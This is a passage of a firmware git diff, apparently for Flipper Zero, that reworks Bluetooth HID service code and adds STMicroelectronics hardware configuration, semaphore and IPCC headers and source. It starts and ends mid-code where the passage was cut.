hid_svc->report_char_handle[input_report_num], 0, len, data); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed updating report characteristic: %d", status); ++ return false; ++ } ++ return true; ++} ++ ++bool hid_svc_update_info(uint8_t* data, uint16_t len) { ++ furi_assert(data); ++ furi_assert(hid_svc); ++ ++ tBleStatus status = ++ aci_gatt_update_char_value(hid_svc->svc_handle, hid_svc->info_char_handle, 0, len, data); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed updating info characteristic: %d", status); ++ return false; ++ } ++ return true; ++} ++ ++void hid_svc_register_led_state_callback(HidLedStateEventCallback callback, void* context) { ++ furi_assert(hid_svc); ++ furi_assert(callback); ++ furi_assert(context); ++ ++ hid_svc->led_state_event_callback = callback; ++ hid_svc->led_state_ctx = context; ++} ++ ++bool hid_svc_is_started() { ++ return hid_svc != NULL; ++} ++ ++void hid_svc_stop() { ++ tBleStatus status; ++ if(hid_svc) { ++ // Delete characteristics ++ status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->report_map_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Report Map characteristic: %d", status); ++ } ++#if(HID_SVC_INPUT_REPORT_COUNT != 0) ++ for(uint8_t i = 0; i < HID_SVC_REPORT_COUNT; i++) { ++ status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->report_char_handle[i]); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Report characteristic: %d", status); ++ } ++ } ++#endif ++ status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->protocol_mode_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Protocol Mode characteristic: %d", status); ++ } ++ status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->info_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Information characteristic: %d", status); ++ } ++ status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->ctrl_point_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete Control Point characteristic: %d", status); ++ } ++ status = aci_gatt_del_char(hid_svc->svc_handle, hid_svc->led_state_char_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete led state characteristic: %d", status); ++ } ++ // Delete service ++ status = aci_gatt_del_service(hid_svc->svc_handle); ++ if(status) { ++ FURI_LOG_E(TAG, "Failed to delete HID service: %d", status); ++ } ++ // Delete buffer size mutex ++ free(hid_svc); ++ hid_svc = NULL; ++ } ++} +diff --git a/firmware/targets/f7/ble_glue/services/hid_service.h b/firmware/targets/f7/ble_glue/hid_service.h +similarity index 89% +rename from firmware/targets/f7/ble_glue/services/hid_service.h +rename to firmware/targets/f7/ble_glue/hid_service.h +index 4d0ed4c4f..b8f6b244d 100644 +--- a/firmware/targets/f7/ble_glue/services/hid_service.h ++++ b/firmware/targets/f7/ble_glue/hid_service.h +@@ -27,7 +27,6 @@ bool hid_svc_update_report_map(const uint8_t* data, uint16_t len); + + bool hid_svc_update_input_report(uint8_t input_report_num, uint8_t* data, uint16_t len); + +-// Expects data to be of length HID_SVC_INFO_LEN (4 bytes) +-bool hid_svc_update_info(uint8_t* data); ++bool hid_svc_update_info(uint8_t* data, uint16_t len); + + void hid_svc_register_led_state_callback(HidLedStateEventCallback callback, void* context); +diff --git a/firmware/targets/f7/ble_glue/hsem_map.h b/firmware/targets/f7/ble_glue/hsem_map.h +deleted file mode 100644 +index 9a5f51d20..000000000 +--- a/firmware/targets/f7/ble_glue/hsem_map.h ++++ /dev/null +@@ -1,81 +0,0 @@ +-#pragma once +- +-/****************************************************************************** +- * Semaphores +- * THIS SHALL NO BE CHANGED AS THESE SEMAPHORES ARE USED AS WELL ON THE CM0+ +- *****************************************************************************/ +-/** +-* Index of the semaphore used the prevent conflicts after standby sleep. +-* Each CPUs takes this semaphore at standby wakeup until conflicting elements are restored. +-*/ +-#define CFG_HW_PWR_STANDBY_SEMID 10 +-/** +-* The CPU2 may be configured to store the Thread persistent data either in internal NVM storage on CPU2 or in +-* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() +-* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. +-* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: +-* + CPU1 takes CFG_HW_THREAD_NVM_SRAM_SEMID semaphore +-* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) +-* + CPU1 releases CFG_HW_THREAD_NVM_SRAM_SEMID semaphore +-* CFG_HW_THREAD_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. +-* There is no timing constraint on how long this semaphore can be kept. +-*/ +-#define CFG_HW_THREAD_NVM_SRAM_SEMID 9 +- +-/** +-* The CPU2 may be configured to store the BLE persistent data either in internal NVM storage on CPU2 or in +-* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() +-* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. +-* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: +-* + CPU1 takes CFG_HW_BLE_NVM_SRAM_SEMID semaphore +-* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) +-* + CPU1 releases CFG_HW_BLE_NVM_SRAM_SEMID semaphore +-* CFG_HW_BLE_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. +-* There is no timing constraint on how long this semaphore can be kept. +-*/ +-#define CFG_HW_BLE_NVM_SRAM_SEMID 8 +- +-/** +-* Index of the semaphore used by CPU2 to prevent the CPU1 to either write or erase data in flash +-* The CPU1 shall not either write or erase in flash when this semaphore is taken by the CPU2 +-* When the CPU1 needs to either write or erase in flash, it shall first get the semaphore and release it just +-* after writing a raw (64bits data) or erasing one sector. +-* Once the Semaphore has been released, there shall be at least 1us before it can be taken again. This is required +-* to give the opportunity to CPU2 to take it. +-* On v1.4.0 and older CPU2 wireless firmware, this semaphore is unused and CPU2 is using PES bit. +-* By default, CPU2 is using the PES bit to protect its timing. The CPU1 may request the CPU2 to use the semaphore +-* instead of the PES bit by sending the system command SHCI_C2_SetFlashActivityControl() +-*/ +-#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU2_SEMID 7 +- +-/** +-* Index of the semaphore used by CPU1 to prevent the CPU2 to either write or erase data in flash +-* In order to protect its timing, the CPU1 may get this semaphore to prevent the CPU2 to either +-* write or erase in flash (as this will stall both CPUs) +-* The PES bit shall not be used as this may stall the CPU2 in some cases. +-*/ +-#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU1_SEMID 6 +- +-/** +-* Index of the semaphore used to manage the CLK48 clock configuration +-* When the USB is required, this semaphore shall be taken before configuring te CLK48 for USB +-* and should be released after the application switch OFF the clock when the USB is not used anymore +-* When using the RNG, it is good enough to use CFG_HW_RNG_SEMID to control CLK48. +-* More details in AN5289 +-*/ +-#define CFG_HW_CLK48_CONFIG_SEMID 5 +- +-/* Index of the semaphore used to manage the entry Stop Mode procedure */ +-#define CFG_HW_ENTRY_STOP_MODE_SEMID 4 +- +-/* Index of the semaphore used to access the RCC */ +-#define CFG_HW_RCC_SEMID 3 +- +-/* Index of the semaphore used to access the FLASH */ +-#define CFG_HW_FLASH_SEMID 2 +- +-/* Index of the semaphore used to access the PKA */ +-#define CFG_HW_PKA_SEMID 1 +- +-/* Index of the semaphore used to access the RNG */ +-#define CFG_HW_RNG_SEMID 0 +diff --git a/firmware/targets/f7/ble_glue/hw_conf.h b/firmware/targets/f7/ble_glue/hw_conf.h +new file mode 100644 +index 000000000..bf18a7d0e +--- /dev/null ++++ b/firmware/targets/f7/ble_glue/hw_conf.h +@@ -0,0 +1,231 @@ ++/* USER CODE BEGIN Header */ ++/** ++ ****************************************************************************** ++ * @file hw_conf.h ++ * @author MCD Application Team ++ * @brief Configuration of hardware interface ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2019 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++/* USER CODE END Header */ ++ ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef HW_CONF_H ++#define HW_CONF_H ++ ++#include "FreeRTOSConfig.h" ++ ++/****************************************************************************** ++ * Semaphores ++ * THIS SHALL NO BE CHANGED AS THESE SEMAPHORES ARE USED AS WELL ON THE CM0+ ++ *****************************************************************************/ ++/** ++* Index of the semaphore used the prevent conflicts after standby sleep. ++* Each CPUs takes this semaphore at standby wakeup until conclicting elements are restored. ++*/ ++#define CFG_HW_PWR_STANDBY_SEMID 10 ++/** ++* The CPU2 may be configured to store the Thread persistent data either in internal NVM storage on CPU2 or in ++* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() ++* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. ++* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: ++* + CPU1 takes CFG_HW_THREAD_NVM_SRAM_SEMID semaphore ++* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) ++* + CPU1 releases CFG_HW_THREAD_NVM_SRAM_SEMID semaphore ++* CFG_HW_THREAD_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. ++* There is no timing constraint on how long this semaphore can be kept. ++*/ ++#define CFG_HW_THREAD_NVM_SRAM_SEMID 9 ++ ++/** ++* The CPU2 may be configured to store the BLE persistent data either in internal NVM storage on CPU2 or in ++* SRAM2 buffer provided by the user application. This can be configured with the system command SHCI_C2_Config() ++* When the CPU2 is requested to store persistent data in SRAM2, it can write data in this buffer at any time when needed. ++* In order to read consistent data with the CPU1 from the SRAM2 buffer, the flow should be: ++* + CPU1 takes CFG_HW_BLE_NVM_SRAM_SEMID semaphore ++* + CPU1 reads all persistent data from SRAM2 (most of the time, the goal is to write these data into an NVM managed by CPU1) ++* + CPU1 releases CFG_HW_BLE_NVM_SRAM_SEMID semaphore ++* CFG_HW_BLE_NVM_SRAM_SEMID semaphore makes sure CPU2 does not update the persistent data in SRAM2 at the same time CPU1 is reading them. ++* There is no timing constraint on how long this semaphore can be kept. ++*/ ++#define CFG_HW_BLE_NVM_SRAM_SEMID 8 ++ ++/** ++* Index of the semaphore used by CPU2 to prevent the CPU1 to either write or erase data in flash ++* The CPU1 shall not either write or erase in flash when this semaphore is taken by the CPU2 ++* When the CPU1 needs to either write or erase in flash, it shall first get the semaphore and release it just ++* after writing a raw (64bits data) or erasing one sector. ++* Once the Semaphore has been released, there shall be at least 1us before it can be taken again. This is required ++* to give the opportunity to CPU2 to take it. ++* On v1.4.0 and older CPU2 wireless firmware, this semaphore is unused and CPU2 is using PES bit. ++* By default, CPU2 is using the PES bit to protect its timing. The CPU1 may request the CPU2 to use the semaphore ++* instead of the PES bit by sending the system command SHCI_C2_SetFlashActivityControl() ++*/ ++#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU2_SEMID 7 ++ ++/** ++* Index of the semaphore used by CPU1 to prevent the CPU2 to either write or erase data in flash ++* In order to protect its timing, the CPU1 may get this semaphore to prevent the CPU2 to either ++* write or erase in flash (as this will stall both CPUs) ++* The PES bit shall not be used as this may stall the CPU2 in some cases. ++*/ ++#define CFG_HW_BLOCK_FLASH_REQ_BY_CPU1_SEMID 6 ++ ++/** ++* Index of the semaphore used to manage the CLK48 clock configuration ++* When the USB is required, this semaphore shall be taken before configuring te CLK48 for USB ++* and should be released after the application switch OFF the clock when the USB is not used anymore ++* When using the RNG, it is good enough to use CFG_HW_RNG_SEMID to control CLK48. ++* More details in AN5289 ++*/ ++#define CFG_HW_CLK48_CONFIG_SEMID 5 ++ ++/* Index of the semaphore used to manage the entry Stop Mode procedure */ ++#define CFG_HW_ENTRY_STOP_MODE_SEMID 4 ++ ++/* Index of the semaphore used to access the RCC */ ++#define CFG_HW_RCC_SEMID 3 ++ ++/* Index of the semaphore used to access the FLASH */ ++#define CFG_HW_FLASH_SEMID 2 ++ ++/* Index of the semaphore used to access the PKA */ ++#define CFG_HW_PKA_SEMID 1 ++ ++/* Index of the semaphore used to access the RNG */ ++#define CFG_HW_RNG_SEMID 0 ++ ++/****************************************************************************** ++ * HW TIMER SERVER ++ *****************************************************************************/ ++/** ++ * The user may define the maximum number of virtual timers supported. ++ * It shall not exceed 255 ++ */ ++#define CFG_HW_TS_MAX_NBR_CONCURRENT_TIMER 6 ++ ++/** ++ * The user may define the priority in the NVIC of the RTC_WKUP interrupt handler that is used to manage the ++ * wakeup timer. ++ * This setting is the preemptpriority part of the NVIC. ++ */ ++#define CFG_HW_TS_NVIC_RTC_WAKEUP_IT_PREEMPTPRIO \ ++ (configLIBRARY_MAX_SYSCALL_INTERRUPT_PRIORITY + 1) /* FreeRTOS requirement */ ++ ++/** ++ * The user may define the priority in the NVIC of the RTC_WKUP interrupt handler that is used to manage the ++ * wakeup timer. ++ * This setting is the subpriority part of the NVIC. It does not exist on all processors. When it is not supported ++ * on the CPU, the setting is ignored ++ */ ++#define CFG_HW_TS_NVIC_RTC_WAKEUP_IT_SUBPRIO 0 ++ ++/** ++ * Define a critical section in the Timer server ++ * The Timer server does not support the API to be nested ++ * The Application shall either: ++ * a) Ensure this will never happen ++ * b) Define the critical section ++ * The default implementations is masking all interrupts using the PRIMASK bit ++ * The TimerServer driver uses critical sections to avoid context corruption. This is achieved with the macro ++ * TIMER_ENTER_CRITICAL_SECTION and TIMER_EXIT_CRITICAL_SECTION. When CFG_HW_TS_USE_PRIMASK_AS_CRITICAL_SECTION is set ++ * to 1, all STM32 interrupts are masked with the PRIMASK bit of the CortexM CPU. It is possible to use the BASEPRI ++ * register of the CortexM CPU to keep allowed some interrupts with high priority. In that case, the user shall ++ * re-implement TIMER_ENTER_CRITICAL_SECTION and TIMER_EXIT_CRITICAL_SECTION and shall make sure that no TimerServer ++ * API are called when the TIMER critical section is entered ++ */ ++#define CFG_HW_TS_USE_PRIMASK_AS_CRITICAL_SECTION 1 ++ ++/** ++ * This value shall reflect the maximum delay there could be in the application between the time the RTC interrupt ++ * is generated by the Hardware and the time when the RTC interrupt handler is called. This time is measured in ++ * number of RTCCLK ticks. ++ * A relaxed timing would be 10ms ++ * When the value is too short, the timerserver will not be able to count properly and all timeout may be random. ++ * When the value is too long, the device may wake up more often than the most optimal configuration. However, the ++ * impact on power consumption would be marginal (unless the value selected is extremely too long). It is strongly ++ * recommended to select a value large enough to make sure it is not too short to ensure reliability of the system ++ * as this will have marginal impact on low power mode ++ */ ++#define CFG_HW_TS_RTC_HANDLER_MAX_DELAY (10 * (LSI_VALUE / 1000)) ++ ++/** ++ * Interrupt ID in the NVIC of the RTC Wakeup interrupt handler ++ * It shall be type of IRQn_Type ++ */ ++#define CFG_HW_TS_RTC_WAKEUP_HANDLER_ID RTC_WKUP_IRQn ++ ++/****************************************************************************** ++ * HW UART ++ *****************************************************************************/ ++#define CFG_HW_LPUART1_ENABLED 0 ++#define CFG_HW_LPUART1_DMA_TX_SUPPORTED 0 ++ ++#define CFG_HW_USART1_ENABLED 1 ++#define CFG_HW_USART1_DMA_TX_SUPPORTED 1 ++ ++/** ++ * UART1 ++ */ ++#define CFG_HW_USART1_PREEMPTPRIORITY 0x0F ++#define CFG_HW_USART1_SUBPRIORITY 0 ++ ++/** < The application shall check the selected source clock is enable */ ++#define CFG_HW_USART1_SOURCE_CLOCK RCC_USART1CLKSOURCE_SYSCLK ++ ++#define CFG_HW_USART1_BAUDRATE 115200 ++#define CFG_HW_USART1_WORDLENGTH UART_WORDLENGTH_8B ++#define CFG_HW_USART1_STOPBITS UART_STOPBITS_1 ++#define CFG_HW_USART1_PARITY UART_PARITY_NONE ++#define CFG_HW_USART1_HWFLOWCTL UART_HWCONTROL_NONE ++#define CFG_HW_USART1_MODE UART_MODE_TX_RX ++#define CFG_HW_USART1_ADVFEATUREINIT UART_ADVFEATURE_NO_INIT ++#define CFG_HW_USART1_OVERSAMPLING UART_OVERSAMPLING_8 ++ ++#define CFG_HW_USART1_TX_PORT_CLK_ENABLE __HAL_RCC_GPIOB_CLK_ENABLE ++#define CFG_HW_USART1_TX_PORT GPIOB ++#define CFG_HW_USART1_TX_PIN GPIO_PIN_6 ++#define CFG_HW_USART1_TX_MODE GPIO_MODE_AF_PP ++#define CFG_HW_USART1_TX_PULL GPIO_NOPULL ++#define CFG_HW_USART1_TX_SPEED GPIO_SPEED_FREQ_VERY_HIGH ++#define CFG_HW_USART1_TX_ALTERNATE GPIO_AF7_USART1 ++ ++#define CFG_HW_USART1_RX_PORT_CLK_ENABLE __HAL_RCC_GPIOB_CLK_ENABLE ++#define CFG_HW_USART1_RX_PORT GPIOB ++#define CFG_HW_USART1_RX_PIN GPIO_PIN_7 ++#define CFG_HW_USART1_RX_MODE GPIO_MODE_AF_PP ++#define CFG_HW_USART1_RX_PULL GPIO_NOPULL ++#define CFG_HW_USART1_RX_SPEED GPIO_SPEED_FREQ_VERY_HIGH ++#define CFG_HW_USART1_RX_ALTERNATE GPIO_AF7_USART1 ++ ++#define CFG_HW_USART1_CTS_PORT_CLK_ENABLE __HAL_RCC_GPIOA_CLK_ENABLE ++#define CFG_HW_USART1_CTS_PORT GPIOA ++#define CFG_HW_USART1_CTS_PIN GPIO_PIN_11 ++#define CFG_HW_USART1_CTS_MODE GPIO_MODE_AF_PP ++#define CFG_HW_USART1_CTS_PULL GPIO_PULLDOWN ++#define CFG_HW_USART1_CTS_SPEED GPIO_SPEED_FREQ_VERY_HIGH ++#define CFG_HW_USART1_CTS_ALTERNATE GPIO_AF7_USART1 ++ ++#define CFG_HW_USART1_DMA_TX_PREEMPTPRIORITY 0x0F ++#define CFG_HW_USART1_DMA_TX_SUBPRIORITY 0 ++ ++#define CFG_HW_USART1_DMAMUX_CLK_ENABLE __HAL_RCC_DMAMUX1_CLK_ENABLE ++#define CFG_HW_USART1_DMA_CLK_ENABLE __HAL_RCC_DMA2_CLK_ENABLE ++#define CFG_HW_USART1_TX_DMA_REQ DMA_REQUEST_USART1_TX ++#define CFG_HW_USART1_TX_DMA_CHANNEL DMA2_Channel4 ++#define CFG_HW_USART1_TX_DMA_IRQn DMA2_Channel4_IRQn ++#define CFG_HW_USART1_DMA_TX_IRQHandler DMA2_Channel4_IRQHandler ++ ++#endif /*HW_CONF_H */ ++ ++/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/ble_glue/hw_if.h b/firmware/targets/f7/ble_glue/hw_if.h +new file mode 100644 +index 000000000..a0ac23df3 +--- /dev/null ++++ b/firmware/targets/f7/ble_glue/hw_if.h +@@ -0,0 +1,102 @@ ++/* USER CODE BEGIN Header */ ++/** ++ ****************************************************************************** ++ * @file hw_if.h ++ * @author MCD Application Team ++ * @brief Hardware Interface ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2019 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++/* USER CODE END Header */ ++ ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef HW_IF_H ++#define HW_IF_H ++ ++#ifdef __cplusplus ++extern "C" { ++#endif ++ ++/* Includes ------------------------------------------------------------------*/ ++#include "stm32wbxx.h" ++#include "stm32wbxx_ll_exti.h" ++#include "stm32wbxx_ll_system.h" ++#include "stm32wbxx_ll_rcc.h" ++#include "stm32wbxx_ll_ipcc.h" ++#include "stm32wbxx_ll_bus.h" ++#include "stm32wbxx_ll_pwr.h" ++#include "stm32wbxx_ll_cortex.h" ++#include "stm32wbxx_ll_utils.h" ++#include "stm32wbxx_ll_hsem.h" ++#include "stm32wbxx_ll_gpio.h" ++#include "stm32wbxx_ll_rtc.h" ++ ++#ifdef USE_STM32WBXX_USB_DONGLE ++#include "stm32wbxx_usb_dongle.h" ++#endif ++#ifdef USE_STM32WBXX_NUCLEO ++#include "stm32wbxx_nucleo.h" ++#endif ++#ifdef USE_X_NUCLEO_EPD ++#include "x_nucleo_epd.h" ++#endif ++ ++/* Private includes ----------------------------------------------------------*/ ++/* USER CODE BEGIN Includes */ ++ ++/* USER CODE END Includes */ ++ ++/****************************************************************************** ++ * HW UART ++ ******************************************************************************/ ++typedef enum { ++ hw_uart1, ++ hw_uart2, ++ hw_lpuart1, ++} hw_uart_id_t; ++ ++typedef enum { ++ hw_uart_ok, ++ hw_uart_error, ++ hw_uart_busy, ++ hw_uart_to, ++} hw_status_t; ++ ++void HW_UART_Init(hw_uart_id_t hw_uart_id); ++void HW_UART_Receive_IT( ++ hw_uart_id_t hw_uart_id, ++ uint8_t* pData, ++ uint16_t Size, ++ void (*Callback)(void)); ++void HW_UART_Transmit_IT( ++ hw_uart_id_t hw_uart_id, ++ uint8_t* pData, ++ uint16_t Size, ++ void (*Callback)(void)); ++hw_status_t ++ HW_UART_Transmit(hw_uart_id_t hw_uart_id, uint8_t* p_data, uint16_t size, uint32_t timeout); ++hw_status_t HW_UART_Transmit_DMA( ++ hw_uart_id_t hw_uart_id, ++ uint8_t* p_data, ++ uint16_t size, ++ void (*Callback)(void)); ++void HW_UART_Interrupt_Handler(hw_uart_id_t hw_uart_id); ++void HW_UART_DMA_Interrupt_Handler(hw_uart_id_t hw_uart_id); ++ ++#ifdef __cplusplus ++} ++#endif ++ ++#endif /*HW_IF_H */ ++ ++/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ +diff --git a/firmware/targets/f7/ble_glue/hw_ipcc.c b/firmware/targets/f7/ble_glue/hw_ipcc.c +index c2397f351..7c84df09f 100644 +--- a/firmware/targets/f7/ble_glue/hw_ipcc.c ++++ b/firmware/targets/f7/ble_glue/hw_ipcc.c +@@ -1,52 +1,160 @@ ++/** ++ ****************************************************************************** ++ * File Name : Target/hw_ipcc.c ++ * Description : Hardware IPCC source file for STM32WPAN Middleware. ++ * ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2020 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++ ++/* Includes ------------------------------------------------------------------*/ + #include "app_common.h" + #include +-#include +-#include +- +-#include +-#include +- +-#include +- +-#define HW_IPCC_TX_PENDING(channel) \ +- ((!(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, channel))) && \ +- LL_C1_IPCC_IsEnabledTransmitChannel(IPCC, channel)) +-#define HW_IPCC_RX_PENDING(channel) \ +- (LL_C2_IPCC_IsActiveFlag_CHx(IPCC, channel) && \ +- LL_C1_IPCC_IsEnabledReceiveChannel(IPCC, channel)) + +-static void (*FreeBufCb)(); +- +-static void HW_IPCC_BLE_EvtHandler(); +-static void HW_IPCC_BLE_AclDataEvtHandler(); +-static void HW_IPCC_MM_FreeBufHandler(); +-static void HW_IPCC_SYS_CmdEvtHandler(); +-static void HW_IPCC_SYS_EvtHandler(); +-static void HW_IPCC_TRACES_EvtHandler(); +- +-void HW_IPCC_Rx_Handler() { ++/* Global variables ---------------------------------------------------------*/ ++/* Private defines -----------------------------------------------------------*/ ++#define HW_IPCC_TX_PENDING(channel) \ ++ (!(LL_C1_IPCC_IsActiveFlag_CHx(IPCC, channel))) && (((~(IPCC->C1MR)) & ((channel) << 16U))) ++#define HW_IPCC_RX_PENDING(channel) \ ++ (LL_C2_IPCC_IsActiveFlag_CHx(IPCC, channel)) && (((~(IPCC->C1MR)) & ((channel) << 0U))) ++ ++/* Private macros ------------------------------------------------------------*/ ++/* Private typedef -----------------------------------------------------------*/ ++/* Private variables ---------------------------------------------------------*/ ++static void (*FreeBufCb)(void); ++ ++/* Private function prototypes -----------------------------------------------*/ ++static void HW_IPCC_BLE_EvtHandler(void); ++static void HW_IPCC_BLE_AclDataEvtHandler(void); ++static void HW_IPCC_MM_FreeBufHandler(void); ++static void HW_IPCC_SYS_CmdEvtHandler(void); ++static void HW_IPCC_SYS_EvtHandler(void); ++static void HW_IPCC_TRACES_EvtHandler(void); ++ ++#ifdef THREAD_WB ++static void HW_IPCC_OT_CmdEvtHandler(void); ++static void HW_IPCC_THREAD_NotEvtHandler(void); ++static void HW_IPCC_THREAD_CliNotEvtHandler(void); ++#endif ++ ++#ifdef LLD_TESTS_WB ++static void HW_IPCC_LLDTESTS_ReceiveCliRspHandler(void); ++static void HW_IPCC_LLDTESTS_ReceiveM0CmdHandler(void); ++#endif ++#ifdef LLD_BLE_WB ++/*static void HW_IPCC_LLD_BLE_ReceiveCliRspHandler( void );*/ ++static void HW_IPCC_LLD_BLE_ReceiveRspHandler(void); ++static void HW_IPCC_LLD_BLE_ReceiveM0CmdHandler(void); ++#endif ++ ++#ifdef MAC_802_15_4_WB ++static void HW_IPCC_MAC_802_15_4_CmdEvtHandler(void); ++static void HW_IPCC_MAC_802_15_4_NotEvtHandler(void); ++#endif ++ ++#ifdef ZIGBEE_WB ++static void HW_IPCC_ZIGBEE_CmdEvtHandler(void); ++static void HW_IPCC_ZIGBEE_StackNotifEvtHandler(void); ++static void HW_IPCC_ZIGBEE_StackM0RequestHandler(void); ++#endif ++ ++/* Public function definition -----------------------------------------------*/ ++ ++/****************************************************************************** ++ * INTERRUPT HANDLER ++ ******************************************************************************/ ++void HW_IPCC_Rx_Handler(void) { + if(HW_IPCC_RX_PENDING(HW_IPCC_SYSTEM_EVENT_CHANNEL)) { + HW_IPCC_SYS_EvtHandler(); +- } else if(HW_IPCC_RX_PENDING(HW_IPCC_BLE_EVENT_CHANNEL)) { ++ } ++#ifdef MAC_802_15_4_WB ++ else if(HW_IPCC_RX_PENDING(HW_IPCC_MAC_802_15_4_NOTIFICATION_ACK_CHANNEL)) { ++ HW_IPCC_MAC_802_15_4_NotEvtHandler(); ++ } ++#endif /* MAC_802_15_4_WB */ ++#ifdef THREAD_WB ++ else if(HW_IPCC_RX_PENDING(HW_IPCC_THREAD_NOTIFICATION_ACK_CHANNEL)) { ++ HW_IPCC_THREAD_NotEvtHandler(); ++ } else if(HW_IPCC_RX_PENDING(HW_IPCC_THREAD_CLI_NOTIFICATION_ACK_CHANNEL)) { ++ HW_IPCC_THREAD_CliNotEvtHandler(); ++ } ++#endif /* THREAD_WB */ ++#ifdef LLD_TESTS_WB ++ else if(HW_IPCC_RX_PENDING(HW_IPCC_LLDTESTS_CLI_RSP_CHANNEL)) { ++ HW_IPCC_LLDTESTS_ReceiveCliRspHandler(); ++ } else if(HW_IPCC_RX_PENDING(HW_IPCC_LLDTESTS_M0_CMD_CHANNEL)) { ++ HW_IPCC_LLDTESTS_ReceiveM0CmdHandler(); ++ } ++#endif /* LLD_TESTS_WB */ ++#ifdef LLD_BLE_WB ++ else if(HW_IPCC_RX_PENDING(HW_IPCC_LLD_BLE_RSP_CHANNEL)) { ++ HW_IPCC_LLD_BLE_ReceiveRspHandler(); ++ } else if(HW_IPCC_RX_PENDING(HW_IPCC_LLD_BLE_M0_CMD_CHANNEL)) { ++ HW_IPCC_LLD_BLE_ReceiveM0CmdHandler(); ++ } ++#endif /* LLD_TESTS_WB */ ++#ifdef ZIGBEE_WB ++ else if(HW_IPCC_RX_PENDING(HW_IPCC_ZIGBEE_APPLI_NOTIF_ACK_CHANNEL)) { ++ HW_IPCC_ZIGBEE_StackNotifEvtHandler(); ++ } else if(HW_IPCC_RX_PENDING(HW_IPCC_ZIGBEE_M0_REQUEST_CHANNEL)) { ++ HW_IPCC_ZIGBEE_StackM0RequestHandler(); ++ } ++#endif /* ZIGBEE_WB */ ++ else if(HW_IPCC_RX_PENDING(HW_IPCC_BLE_EVENT_CHANNEL)) { + HW_IPCC_BLE_EvtHandler(); + } else if(HW_IPCC_RX_PENDING(HW_IPCC_TRACES_CHANNEL)) { + HW_IPCC_TRACES_EvtHandler(); + } ++ ++ return; + } + +-void HW_IPCC_Tx_Handler() { ++void HW_IPCC_Tx_Handler(void) { + if(HW_IPCC_TX_PENDING(HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { + HW_IPCC_SYS_CmdEvtHandler(); +- } else if(HW_IPCC_TX_PENDING(HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { ++ } ++#ifdef MAC_802_15_4_WB ++ else if(HW_IPCC_TX_PENDING(HW_IPCC_MAC_802_15_4_CMD_RSP_CHANNEL)) { ++ HW_IPCC_MAC_802_15_4_CmdEvtHandler(); ++ } ++#endif /* MAC_802_15_4_WB */ ++#ifdef THREAD_WB ++ else if(HW_IPCC_TX_PENDING(HW_IPCC_THREAD_OT_CMD_RSP_CHANNEL)) { ++ HW_IPCC_OT_CmdEvtHandler(); ++ } ++#endif /* THREAD_WB */ ++#ifdef LLD_TESTS_WB ++// No TX handler for LLD tests ++#endif /* LLD_TESTS_WB */ ++#ifdef ZIGBEE_WB ++ if(HW_IPCC_TX_PENDING(HW_IPCC_ZIGBEE_CMD_APPLI_CHANNEL)) { ++ HW_IPCC_ZIGBEE_CmdEvtHandler(); ++ } ++#endif /* ZIGBEE_WB */ ++ else if(HW_IPCC_TX_PENDING(HW_IPCC_SYSTEM_CMD_RSP_CHANNEL)) { + HW_IPCC_SYS_CmdEvtHandler(); + } else if(HW_IPCC_TX_PENDING(HW_IPCC_MM_RELEASE_BUFFER_CHANNEL)) { + 